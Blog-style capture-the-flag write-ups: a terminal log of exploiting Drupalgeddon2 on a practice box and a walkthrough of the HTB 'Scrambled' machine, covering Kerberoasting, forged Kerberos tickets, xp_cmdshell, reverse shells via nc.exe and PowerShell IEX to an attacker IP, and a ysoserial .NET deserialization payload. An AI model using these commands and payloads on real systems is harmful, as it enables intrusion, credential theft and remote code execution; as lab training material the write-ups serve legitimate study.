Category: Uncategorized
Protected: HTB-Flight-private
Protected: htb-shoppy-private
Protected: htb-object-private
ptd-chilakiller
.
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182] └──╼ $cat ports.nmap # Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182 Nmap scan report for 10.150.150.182 Host is up (0.086s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA) | 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA) |_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519) 80/tcp open http nginx 1.4.0 (Ubuntu) | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Mon, 29 Aug 2022 09:00:40 GMT | Server: nginx 1.4.0 (Ubuntu) | Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT | ETag: "264-5abd7039b3849" | Accept-Ranges: bytes | Content-Length: 612 | Vary: Accept-Encoding | Connection: close | Content-Type: text/html | <!DOCTYPE html> | <html> | <head> | <title>Welcome to nginx!</title> | <style> | body { | width: 35em; | margin: 0 auto; | font-family: Tahoma, Verdana, Arial, sans-serif; | </style> | </head> | <body> | <h1>Welcome to nginx!</h1> | <p>If you see this page, the nginx web server is successfully installed and | working. Further configuration is required.</p> | <p>For online documentation and support please refer to | href="http://nginx.org/">nginx.org</a>.<br/> | Commercial support is available at | href="http://nginx.com/">nginx.com</a>.</p> | <p><em>Thank you for using nginx.</em></p> | </body> | </html> | HTTPOptions: | HTTP/1.1 200 OK | Date: Mon, 29 Aug 2022 09:00:40 GMT | Server: nginx 1.4.0 (Ubuntu) | Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST | Content-Length: 0 | Connection: close | Content-Type: text/html | RTSPRequest: | HTTP/1.1 400 Bad Request | Date: Mon, 29 Aug 2022 09:00:40 GMT | Server: nginx 1.4.0 (Ubuntu) | Content-Length: 299 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | <html><head> | <title>400 Bad Request</title> | </head><body> | <h1>Bad Request</h1> | <p>Your browser sent a request that this server could not understand.<br /> | </p> | <hr> | <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address> |_ </body></html> |_http-title: Welcome to nginx! |_http-server-header: nginx 1.4.0 (Ubuntu) 8080/tcp open http-proxy nginx 1.4.0 (Ubuntu) | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Mon, 29 Aug 2022 09:00:40 GMT | Server: nginx 1.4.0 (Ubuntu) | Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT | ETag: "264-5abd7039b3849" | Accept-Ranges: bytes | Content-Length: 612 | Vary: Accept-Encoding | Connection: close | Content-Type: text/html | <!DOCTYPE html> | <html> | <head> | <title>Welcome to nginx!</title> | <style> | body { | width: 35em; | margin: 0 auto; | font-family: Tahoma, Verdana, Arial, sans-serif; | </style> | </head> | <body> | <h1>Welcome to nginx!</h1> | <p>If you see this page, the nginx web server is successfully installed and |--snipp-- \x2080</address>\n</body></ SF:html>\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds ┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run
[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check (“set AutoCheck false” to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200
ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >
cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!– FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 –>
</body>
</html>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
<nte/sites/default$ cat settings.php | grep password
* ‘password’ => ‘password’,
* username, password, host, and database name.
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
‘password’ => ‘EstaContraNoesTanImp0rtant3!!!’,
* by using the username and password variables. The proxy_user_agent variable
# $conf[‘proxy_password’] = ”;
www-data@chilakiller:/var/www/html/restaurante/sites/default$
www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
</html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
MariaDB [(none)]>
MariaDB [drupaldb]> select * from ptd_users;
select * from ptd_users;
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local | | | NULL | 1596317328 | 1643552710 | 1643551677 | 1 | America/Mexico_City | | 0 | chilakiller@ptd.local | b:0; |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
2 rows in set (0.00 sec)
MariaDB [drupaldb]>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1
user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$
user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$
su root
pw = ChilaKill3s_Tru3_L0v3R
root@chilakiller:~# cat FLAG2.txt
cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762
root@chilakiller:/var/www/html/restaurante# find / -name “FLAG1.txt”
find / -name “FLAG1.txt”
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
<rante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#
root@chilakiller:/var/www/html/restaurante# hostnamectl hostnamectl Static hostname: chilakiller Icon name: computer-vm Chassis: vm Machine ID: c8677bebac964d43bed5ebe1af1caaa6 Boot ID: 907f69a447f04a8782bde75417cec04a Virtualization: vmware Operating System: Debian GNU/Linux 9 (stretch) Kernel: Linux 4.9.0-13-amd64 Architecture: x86-64 root@chilakiller:/var/www/html/restaurante#
Author : Puckiestyle
Protected: htb-backendtwo-private
Protected: htb-streameo-private
Protected: htb-overgraph-private
htb-scrambled-nl
Scrambled
Scanning
> TARGET=10.10.11.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp open found? syn-ack ttl 127
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49552/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
There are many open ports, this is seemingly a target on AD, with ldap and kerberos enabled. We need to do enum at several interesting places.
Found several domain names that might be useful later.
scrm.local
DC1.scrm.local
scramblecorp.com
Web Enum
Web enum found something interesting: http://scrm.local/support.html
04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues
http://scrm.local/supportrequest.html, there is also a username found in the screenshot, ksimpson.

http://scrm.local/salesorders.html, this page shows a client application used for this organisation. Later, we will find there is a server running on port 4411.
If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following:
A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem
Directory enum didn’t find anything useful
> dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
[19:48:54] Starting:
[19:50:00] 301 - 148B - /assets -> http://scrm.local/assets/
[19:50:40] 301 - 148B - /images -> http://scrm.local/images/
[19:50:41] 200 - 2KB - /index.html
[19:51:07] 200 - 2KB - /passwords.html
[19:51:41] 200 - 2KB - /support.html
Further page enum didn’t find anything intersting
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/FUZZ.html"
Subdomain enum didn’t find anything useful
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/" -H "Host: FUZZ.scrm.local"
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scramblecorp.com/" -H "Host: FUZZ.scramblecorp.com"
So, this target may not have much to do with web vectors.
Host Enum
Perform host enum, didn’t find anything useful
> enum4linux 10.10.11.168
Port 4411 Enum
Use nc to connect to the non-conventional port 4411, there seems to be a server application running here. But we cannot confirm what application it is.
> nc -vn 10.10.11.168 4411

LDAP Enum
Perform ldap enum using a simple python module
Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3, 2
Naming contexts:
DC=scrm,DC=local
CN=Configuration,DC=scrm,DC=local
CN=Schema,CN=Configuration,DC=scrm,DC=local
DC=DomainDnsZones,DC=scrm,DC=local
DC=ForestDnsZones,DC=scrm,DC=local
nmap scan using ldap scripts confirms the above results
> nmap -n -sV --script "ldap* and not brute" 10.10.11.168
Overall, nothing useful at this stage
Kerberos Enum
Perform username enum
> kerbrute userenum -d scrm.local --dc 10.10.11.168 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
2022/06/15 20:03:16 > [+] VALID USERNAME: administrator@scrm.local
2022/06/15 20:04:30 > [+] VALID USERNAME: asmith@scrm.local
2022/06/15 20:06:16 > [+] VALID USERNAME: Administrator@scrm.local
2022/06/15 20:07:39 > [+] VALID USERNAME: jhall@scrm.local
2022/06/15 20:16:59 > [+] VALID USERNAME: sjenkins@scrm.local
2022/06/15 20:18:19 > [+] VALID USERNAME: khicks@scrm.local
2022/06/15 20:30:25 > [+] VALID USERNAME: Asmith@scrm.local
2022/06/15 20:48:39 > [+] VALID USERNAME: ASMITH@scrm.local
And, we know there might be a user called ksimpson from the previous screenshot. We can confirm this. This user also happens to use a password that is same as the username.
> kerbrute bruteuser -d scrm.local --dc 10.10.11.168 pass.txt ksimpson

This user can be used to obtain a TGT, to do so, use getTGT.py. Note: you may encounter an error when running the getTGT.py script, fix the script according to https://github.com/SecureAuthCorp/impacket/issues/1206
> getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
> export KRB5CCNAME=ksimpson.ccache
> impacket-GetUserSPNs scrm.local/ksimpson -k -dc-ip dc1.scrm.local -no-pass -request

Save the ticket to a file mssql.kirbi and crack using john
> john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssql.kirbi
The credential for sqlsvc is cracked.

We now have a service principal credential, sqlsvc:Pegasus60
Foothold
Via golden ticket impersonation, we can gain foothold as the service principal, for background refer to: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket
To do so, we need the ntlm hash of a valid account password and the domain SID
Get Domain SID using windapsearch, setup go-windapsearch, https://github.com/ropnop/windapsearch
> ./windapsearch -d 10.10.11.168 -u sqlsvc@scrm.local -p 'Pegasus60' --secure -j -m computers --full

Generate the ntlm hash for the password `Pegasus60` using https://codebeautify.org/ntlm-hash-generator, this gives b999a16500b87d17ec7f2e2a68778f05
Impersonate as Administrator, the uid is 500 by convention, read about how MS manage uid for more background.
> ticketer.py -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 Administrator -spn MSSQLSVC/dc1.scrm.local
> export KRB5CCNAME=Administrator.ccache
Connect to mssql via the impersonated ticket
> mssqlclient.py dc1.scrm.local -k

Enable cmdshell
> enable_xp_cmdshell
> xp_cmdshell("whoami")

Upload nc.exe and create a reverse shell, need to locate a folder where the current account can write to
> xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
> xp_cmdshell ..\..\Temp\nc.exe 10.10.16.3 4444 -e cmd.exe


Upload SharpHound.exe, I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe, and run SharpHound and transfer back to kali for analysis
> certutil.exe -urlcache -f http://10.10.16.3/sh.exe sh.exe

From BloodHound analysis, we can find there is a tstar user from IT group, which has CanPSRemote right. However, this has proven to be useless after some trial and error.
PE
Upload winpeas
> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe
# found something intersting from WinPeas
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected
[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)
There is a pdf document in C:\Shares\Public, it says HR has a database, which may contain user passwords
Check db for user passwords
> sqlcmd -q "select name from sys.databases"

Check tables in ScrambleHR
> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"
# found
Employees
UserImport
Timesheets
Check table content of UserImport, found user MiscSvc with ldap credential
> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"

MiscSvc is an IT User, which mean, it has CanPSRemote permission, but evil-winrm doesn’t work.

Alternatively, use powershell reverse shell to login
> $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('scrm.local\MiscSvc', $SecPassword)
> Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') } -Credential $Cred
# on kali
> rlwrap netcat -lvnp 6666
Receive reverse shell as miscsvc and catch the user flag

From previous enum, there is a server app running at C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe
Check the user that’s running the process received NA, the process might be run by an account with a higher privilege.
> tasklist /v
However we can access c:\shares\it, there is a copy of the Sale Order Client application and a dll file.

* Copy these two files to c:\temp
> nc.exe 10.10.16.3 7777 < ScrambleLib.dll
> nc.exe 10.10.16.3 7777 < ScrambleClient.exe
* On kali
> nc -vnlp 7777 > ScrambleLib.dll
> nc -vnlp 7777 > ScrambleClient.exe
Reverse Eng
We can find some seemingly operation codes from strings
> strings ScrambleLib.dll

Setup ilspy and reverse the dll, https://github.com/icsharpcode/ILSpy
> /root/.dotnet/tools/ilspycmd -p -o decompile ScrambleLib.dll
Read the decompiled code and understand how the commands work. The payloads are .net serialised.


Use ysoserial to exploit .net deserilisation vulnerabilities, this needs to run on windows, https://github.com/pwntester/ysoserial.net
> ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') }"

Run a nc listener and upload the payload
> nc 10.10.16.3 4411
> UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA8ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBdGdZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0T0NJL1BnMEtQRTlpYW1WamRFUmhkR0ZRY205MmFXUmxjaUJOWlhSb2IyUk9ZVzFsUFNKVGRHRnlkQ0lnU1hOSmJtbDBhV0ZzVEc5aFpFVnVZV0pzWldROUlrWmhiSE5sSWlCNGJXeHVjejBpYUhSMGNEb3ZMM05qYUdWdFlYTXViV2xqY205emIyWjBMbU52YlM5M2FXNW1lQzh5TURBMkwzaGhiV3d2Y0hKbGMyVnVkR0YwYVc5dUlpQjRiV3h1Y3pwelpEMGlZMnh5TFc1aGJXVnpjR0ZqWlRwVGVYTjBaVzB1UkdsaFoyNXZjM1JwWTNNN1lYTnpaVzFpYkhrOVUzbHpkR1Z0SWlCNGJXeHVjenA0UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkNJK0RRb2dJRHhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VDJKcVpXTjBTVzV6ZEdGdVkyVStEUW9nSUNBZ1BITmtPbEJ5YjJObGMzTStEUW9nSUNBZ0lDQThjMlE2VUhKdlkyVnpjeTVUZEdGeWRFbHVabTgrRFFvZ0lDQWdJQ0FnSUR4elpEcFFjbTlqWlhOelUzUmhjblJKYm1adklFRnlaM1Z0Wlc1MGN6MGlMMk1nY0c5M1pYSnphR1ZzYkM1bGVHVWdTVzUyYjJ0bExVTnZiVzFoYm1RZ0xVTnZiWEIxZEdWeUlHUmpNU0F0VTJOeWFYQjBRbXh2WTJzZ2V5QkpSVmdvVG1WM0xVOWlhbVZqZENCT1pYUXVWMlZpUTJ4cFpXNTBLUzVrYjNkdWJHOWhaRk4wY21sdVp5Z25hSFIwY0Rvdkx6RXdMakV3TGpFMkxqTXZjMmhsYkd3dWNITXhKeWtnZlNJZ1UzUmhibVJoY21SRmNuSnZja1Z1WTI5a2FXNW5QU0o3ZURwT2RXeHNmU0lnVTNSaGJtUmhjbVJQZFhSd2RYUkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRlZ6WlhKT1lXMWxQU0lpSUZCaGMzTjNiM0prUFNKN2VEcE9kV3hzZlNJZ1JHOXRZV2x1UFNJaUlFeHZZV1JWYzJWeVVISnZabWxzWlQwaVJtRnNjMlVpSUVacGJHVk9ZVzFsUFNKamJXUWlJQzgrRFFvZ0lDQWdJQ0E4TDNOa09sQnliMk5sYzNNdVUzUmhjblJKYm1adlBnMEtJQ0FnSUR3dmMyUTZVSEp2WTJWemN6NE5DaUFnUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvOEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL
Get the reverse shell and catch the root flag

rooted
.